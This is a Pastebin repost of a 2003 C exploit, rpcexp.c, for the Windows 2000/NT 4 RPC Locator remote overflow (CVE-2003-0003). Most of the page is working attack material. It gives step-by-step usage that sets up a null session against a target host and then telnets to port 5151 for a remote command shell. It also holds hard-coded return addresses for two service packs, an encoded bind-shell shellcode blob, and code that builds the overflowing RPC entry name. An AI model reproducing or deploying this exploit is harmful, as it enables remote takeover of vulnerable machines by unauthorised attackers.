Advertisement
FlyFar

Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow - CVE-2003-0003

Jan 23rd, 2024
772
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 7.76 KB | Cybersecurity | 0 0
  1. /****************************************************************************
  2. rpcexp.c
  3. RPC LOCATOR Exploit
  4. Autor: Marcin Wolak
  5. mail: mwolak11@wp.pl
  6. Last update: 30 march 2003
  7. ****************************************************************************/
  8.  
  9. /*****************************************************************************
  10. About Compilation:
  11. What You need to compile rpcexp.c ?
  12. 1. MS Platform SDK (August SDK is sufficient).
  13. 2. Compilator (f.e. MS Visual C++ 6.0).
  14. rpcns4.lib is needed for linking.
  15. *****************************************************************************/
  16.  
  17. /*****************************************************************************
  18. Usage (You want to exploit remote Windows 2000 system (w2khost) with running RPC
  19. Locator Service):
  20. 1. Set registry values in Your workstation as below:
  21. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\NameService\NetworkAddress = w2khost
  22. HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Rpc\NameService\ServerNetworkAddress = w2khost
  23. 2. Establish null session:
  24. net use \\w2khost\ipc$ ""/u: ""
  25. 3. Run Exploit:
  26. rpcexp.exe /os w2ksp3
  27.  
  28. If everything it's ok, rpcexp hangs in console window. You can go to second
  29. cmd console, run telnet (on port 5151) and get cmd on w2khost - just run
  30. on second console:
  31.  
  32. telnet w2khost 5151
  33.  
  34. WARNNING !
  35. With this shellcode You can get remote cmd only once. Second attempt will
  36. be rejected.
  37.  
  38. WARNNING !!
  39. Currently only Windows 2000 Sp3 and Windows NT 4 Sp6a are exploitable with
  40. rpcexp.
  41.  
  42. *****************************************************************************/
  43.  
  44. #define UNICODE
  45. #define RPC_UNICODE_SUPPORTED
  46.  
  47. #define NT4SP6ABRD 0x42
  48. #define W2KSP3BRD 0x142
  49.  
  50. #define NT4SP6AJMP 0x0147FBC4
  51. #define W2KSP3JMP 0x0090F8F0
  52.  
  53. #define NT4SP6ALLA 0x77F137BD
  54. #define NT4SP6AGPA 0x77F13FB3
  55.  
  56. #include <stdio.h>
  57. #include <rpc.h>
  58. #include <rpcnsi.h>
  59.  
  60.  
  61. #define PURPOSE \
  62. "RPC Locator exploit utility \n\
  63. Autor: Marcin Wolak - march 2003 \n\
  64. mail: mwolak@gazeta.pl \n\n\
  65. Tested on:\n\n\
  66. Windows 2000 SP3 \n\
  67. Windows NT 4.0 SP6a \n\n\
  68. Only for educational purposes !!!.\n\n\
  69. Usage:\n\
  70. rpcexp.exe /v  - to view rpcexp info.\n\
  71. rpcexp.exe /os w2ksp3 - to exploit Windows 2000 Sp3.\n\
  72. rpcexp.exe /os ntsp6a - to exploit Windows NT 4 Sp6a.\n"
  73.  
  74.  
  75. char shellcode [] =
  76. "\xEB\x13\x5F\xB9\xCF\x02\xCF\x02\xC1\xE9\x10\x57\x80\x37\x99\x47\xE2\xFA\x5F\xEB"
  77. "\x05\xE8\xE8\xFF\xFF\xFF\x14\x2E\x42\x98\x99\x99\x14\x06\x59\x9B\x99\x99\xCF\x66"
  78. "\x8A\xCE\x14\x06\x5D\x9B\x99\x99\x14\x26\x54\x9B\x99\x99\x10\x5B\x65\xA8\x50\x28"
  79. "\x94\xD0\xA9\x59\x35\x1D\x59\xEC\x60\xCA\xCB\xC8\xCF\xCB\x66\x8A\x32\xC0\xC3\xC2"
  80. "\x7B\x75\xC2\xCA\x14\x02\x59\x9B\x99\x99\xA9\x59\x35\x1D\x59\xEC\x60\xCF\x66\x8A"
  81. "\x10\x5B\xC2\xCA\x14\x02\x5D\x9B\x99\x99\x65\xA8\x50\x28\x9E\xA9\x59\x35\x1D\x59"
  82. "\xEC\x60\xCA\xCB\xC8\xCF\xCB\x66\x8A\x32\xC0\xC3\xC2\x7B\x75\xA8\x59\x2D\x9D\xC9"
  83. "\x58\x71\x9D\xC9\x66\xCE\x55\x10\x5B\xC2\xCA\x14\x02\x25\x99\x99\x99\xA8\x50\x18"
  84. "\x58\xC4\x9B\x99\x99\xC9\x13\x8A\x11\x89\xDA\xD9\x7B\x61\xC1\x14\x02\x15\x99\x99"
  85. "\x99\xCA\xF1\x99\x99\x99\x99\xC9\xC9\xF1\x99\x99\x99\x99\xF1\x99\x99\x99\x99\x66"
  86. "\xCE\x21\xC9\xF1\x99\x89\x99\x99\x66\xCE\x41\xC1\x72\x6D\x70\x9E\x9B\x99\x99\xC6"
  87. "\xCE\x18\x5E\xD5\x99\x99\x99\x10\x67\x18\x5F\x16\x66\x66\x66\xC2\x18\x5A\x39\x99"
  88. "\x99\x99\xCA\xF1\x9B\x9B\x99\x99\x66\xCE\x7D\xA8\x59\xC9\xD9\xC9\xD9\xC9\x66\xCE"
  89. "\x71\x0A\xF1\x89\x99\x99\x99\xCF\xCA\x66\xCE\x75\xF1\x9B\x99\x99\x99\xCA\x66\xCE"
  90. "\x69\xA8\x59\xCE\xC9\x29\x95\x32\xC1\x32\xD9\x32\xC6\xD1\xC9\xCE\xCF\x34\xCF\x66"
  91. "\xCE\x25\xD1\xC9\xCE\x34\xCF\x34\xCF\x66\xCE\x25\xD1\x29\xDD\x10\x9E\xCE\x66\xCE"
  92. "\x59\xA8\x59\x12\xDF\x6D\x10\xDE\xA5\x10\xDE\xD9\x12\x9F\x10\xDE\xA1\xA8\x59\xFF"
  93. "\x21\x98\x98\x10\xDE\xB5\xCE\xCE\xA8\x59\xC9\xC9\xC9\xD9\xC9\xD1\xC9\xC9\x34\xCF"
  94. "\xA8\x59\xC9\x66\xCE\x5D\x66\xEF\x69\x66\xCE\x79\x66\xEF\x65\x66\xCE\x79\xD1\xC9"
  95. "\xC9\xCA\x66\xCE\x6D\x10\x5A\xA8\x59\x2D\x9D\xC9\x58\x71\x9D\xC9\x66\xCE\x55\x10"
  96. "\x5F\xA8\x59\x10\x58\x2C\x9D\xC9\xC9\xCE\xC8\xCF\x66\xEE\x0A\x66\xCE\x51\x18\xA6"
  97. "\x98\x99\x99\x99\xE5\xBC\xA8\x59\xC9\xCE\x66\xAE\xCF\x66\xEE\x0A\x66\xCE\x4D\x90"
  98. "\x59\xED\x8D\xA8\x59\xC9\x66\xAE\xCF\xCA\x66\xCE\x61\xF1\xC9\x99\x99\x99\x66\xCE"
  99. "\x41\x72\x5B\xA8\x59\xC9\x2D\x9D\xC9\xCF\xCA\x66\xCE\x65\xCE\xA8\x50\xC8\xC9\xCF"
  100. "\x66\xEE\x0E\x66\xCE\x49\xF1\xC9\x99\x99\x99\x66\xCE\x41\x72\x38\xC9\x66\xCE\x45"
  101. "\x09\xD2\xDC\xCB\xD7\xDC\xD5\xAA\xAB\x99\xDC\xE1\xF0\xED\xCD\xF1\xEB\xFC\xF8\xFD"
  102. "\x99\xDA\xEB\xFC\xF8\xED\xFC\xCD\xF1\xEB\xFC\xF8\xFD\x99\xDA\xEB\xFC\xF8\xED\xFC"
  103. "\xC9\xF0\xE9\xFC\x99\xDE\xFC\xED\xCA\xED\xF8\xEB\xED\xEC\xE9\xD0\xF7\xFF\xF6\xD8"
  104. "\x99\xDA\xEB\xFC\xF8\xED\xFC\xC9\xEB\xF6\xFA\xFC\xEA\xEA\xD8\x99\xC9\xFC\xFC\xF2"
  105. "\xD7\xF8\xF4\xFC\xFD\xC9\xF0\xE9\xFC\x99\xDE\xF5\xF6\xFB\xF8\xF5\xD8\xF5\xF5\xF6"
  106. "\xFA\x99\xCE\xEB\xF0\xED\xFC\xDF\xF0\xF5\xFC\x99\xCB\xFC\xF8\xFD\xDF\xF0\xF5\xFC"
  107. "\x99\xCA\xF5\xFC\xFC\xE9\x99\xDC\xE1\xF0\xED\xC9\xEB\xF6\xFA\xFC\xEA\xEA\x99\xDA"
  108. "\xF5\xF6\xEA\xFC\xD1\xF8\xF7\xFD\xF5\xFC\x99\xCE\xCA\xD6\xDA\xD2\xAA\xAB\x99\xCE"
  109. "\xCA\xD8\xCA\xED\xF8\xEB\xED\xEC\xE9\x99\xEA\xF6\xFA\xF2\xFC\xED\x99\xFB\xF0\xF7"
  110. "\xFD\x99\xF5\xF0\xEA\xED\xFC\xF7\x99\xF8\xFA\xFA\xFC\xE9\xED\x99\xEA\xFC\xF7\xFD"
  111. "\x99\xEB\xFC\xFA\xEF\x99\x9B\x99\x8D\x86\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99"
  112. "\x99\x99\xFA\xF4\xFD\xB7\xFC\xE1\xFC\x99\xFD\x06\x71\xEE\x81\x02\x71\xEE\x71\x6D"
  113. "\x64\x66\x66\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
  114.  
  115. void Usage(char * pszProgramName)
  116. {
  117.     fprintf(stderr, "%s", PURPOSE);
  118.     exit(1);
  119. }
  120.  
  121. void _CRTAPI1 main(int argc, char **argv)
  122. {
  123.     unsigned short mytab[2000];             // Exploit Buffer
  124.     unsigned char * TmpEntryName  = NULL;       // Temporary Entry.
  125.     unsigned long * EntryName  = NULL;
  126.     unsigned long * TmpPtr  = NULL;
  127.     unsigned short * pszStrBinding = NULL;
  128.     RPC_NS_HANDLE hnsHandle;
  129.     unsigned long NsSntxType = RPC_C_NS_SYNTAX_DEFAULT;
  130.     RPC_STATUS status;
  131.     short fSuccess = 0;
  132.     short fContinue = 1;
  133.     unsigned long i,k;
  134.  
  135.     unsigned long * PtrLLA = (unsigned long*) &shellcode[730];
  136.     unsigned long * PtrGPA = (unsigned long*) &shellcode[734];
  137.     unsigned long JMP = W2KSP3JMP;
  138.     unsigned long BORDER = W2KSP3BRD;
  139.  
  140.     switch(argc){
  141.         case 2:
  142.             if((strlen(argv[1]) == 2) && (!strcmp(argv[1],"/v")))
  143.                 Usage(argv[0]);
  144.             else
  145.                 printf("Bad arguments !!!\n");
  146.             exit(2);
  147.         case 3:
  148.             if((strlen(argv[1]) == 3) && (strlen(argv[2]) == 6) &&
  149.                (!strcmp(argv[1],"/os")) && (!strcmp(argv[2],"w2ksp3")))
  150.                break;
  151.             if((strlen(argv[1]) == 3) && (strlen(argv[2]) == 6) &&
  152.                (!strcmp(argv[1],"/os")) && (!strcmp(argv[2],"ntsp6a")))
  153.             {
  154.                 (*PtrLLA) = NT4SP6ALLA ^ 0x99999999;
  155.                 (*PtrGPA) = NT4SP6AGPA ^ 0x99999999;
  156.                 JMP = NT4SP6AJMP;
  157.                 BORDER = NT4SP6ABRD;
  158.                 break;
  159.             }
  160.         default:
  161.             Usage(argv[0]);
  162.  
  163.     }
  164.  
  165.     EntryName = (unsigned long *) mytab;
  166.     TmpEntryName = (unsigned char *) mytab;
  167.     TmpEntryName[0] = '/';
  168.     TmpEntryName[1] = 0;
  169.     TmpEntryName[2] = '.';
  170.     TmpEntryName[3] = 0;
  171.     TmpEntryName[4] = ':';
  172.     TmpEntryName[5] = 0;
  173.     TmpEntryName[6] = '/';
  174.     TmpEntryName[7] = 0;
  175.     for (i=2;i<768;i++)
  176.     {
  177.         if(i <= BORDER)
  178.             EntryName[i] = JMP;
  179.         if(i == BORDER)
  180.         {
  181.             TmpPtr = (unsigned long*) shellcode;
  182.             for(k = 0;k < 190;k++)
  183.                 EntryName[i+k] = TmpPtr[k];
  184.             i += 189;
  185.         }
  186.         if(i > BORDER)
  187.             EntryName[i] = JMP;
  188.     }
  189.     EntryName[768] = 0;
  190.  
  191.       RpcTryExcept {
  192.           status = RpcNsBindingLookupBegin(NsSntxType,
  193.                                          (unsigned short *) EntryName,
  194.                                          0,
  195.                                          NULL,
  196.                             0,
  197.                             &hnsHandle);
  198.           printf("RpcNsBindingLookupBegin returned 0x%x\n", status);
  199.       }
  200.       RpcExcept(1){
  201.           printf("RPC Runtime raised exception 0x%x\n", RpcExceptionCode());
  202.       }
  203.       RpcEndExcept
  204. } /*End of Main*/
  205.  
  206. // milw0rm.com [2003-04-03]
  207.            
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement